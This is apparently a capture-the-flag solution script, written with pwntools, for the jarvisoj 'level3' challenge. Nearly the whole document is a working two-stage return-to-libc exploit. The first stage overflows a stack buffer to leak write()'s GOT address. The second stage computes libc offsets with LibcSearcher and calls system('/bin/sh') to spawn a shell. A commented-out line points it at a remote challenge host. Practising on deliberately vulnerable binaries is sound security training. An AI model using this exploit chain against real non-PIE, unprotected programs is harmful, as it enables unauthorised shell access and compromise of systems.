jarvisoj_level3 [r2libc]

exp

from pwn import *
from LibcSearcher import *

# Two-stage return-to-libc script for a 32-bit target (every address is packed with p32).
# Stage 1 leaks the runtime address of write() to locate libc; stage 2 reuses the same
# overflow to call system() with the "/bin/sh" string found in that libc.
#
# NOTE(review): the PLT/GOT/main addresses are taken from the ELF file as-is and the
# return address is overwritten directly. That only works if the binary is non-PIE and
# built without a stack canary (presumably the case here; confirm with checksec).
# A stack protector, PIE, or a correctly bounded read in the target would break this chain.

# Debug log level makes pwntools print every byte sent and received.
context(log_level='debug')
proc_name = './level3'
# Run the local copy of the binary; the commented line below is the remote variant.
p = process(proc_name)
# p = remote('node3.buuoj.cn', 28793)
# Parse the binary to resolve the symbol, PLT and GOT addresses used below.
elf = ELF(proc_name)
main_addr = elf.sym['main']
write_plt = elf.plt['write']
write_got = elf.got['write']
# Stage 1 layout: filler | return address = write@plt | return-after-write = main |
# arguments (1, write_got, 4), i.e. write(1, &GOT[write], 4), then re-enter main.
# 0x88 + 4 is presumably the buffer size plus the 4-byte saved frame pointer;
# confirm against the disassembly.
payload = flat(['a' * (0x88 + 4), p32(write_plt), p32(main_addr), p32(1), p32(write_got), p32(4)])
# Wait for the prompt text, then send the stage-1 payload.
p.sendafter('Input:', payload)
# Discard whatever output is currently pending before reading the leak.
# NOTE(review): recv() with no size returns whatever is buffered at that moment, so
# this synchronisation step is timing-dependent and the following 4-byte read may
# not always line up with the leaked value.
p.recv()
# The next 4 bytes are read as the little-endian address stored in write's GOT slot.
write_addr = u32(p.recv(4))
log.info(hex(write_addr))
# Identify the libc build from the leaked address of write. LibcSearcher may ask for a
# manual choice when several candidates match (TODO confirm for this target).
libc = LibcSearcher('write', write_addr)
# libc base = leaked runtime address minus the symbol's offset inside the matched libc.
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
# 'str_bin_sh' is LibcSearcher's key for the offset of the "/bin/sh" string in libc.
str_bin_sh = libc_base + libc.dump('str_bin_sh')
# Stage 2 layout: filler | return address = system | return-after-system = main |
# argument = address of "/bin/sh".
payload1 = flat(['a' * (0x88 + 4), p32(system_addr), p32(main_addr), p32(str_bin_sh)])
# main was re-entered after stage 1, so the same prompt appears again.
p.sendafter('Input:', payload1)
# Hand the connection over to the terminal.
p.interactive()

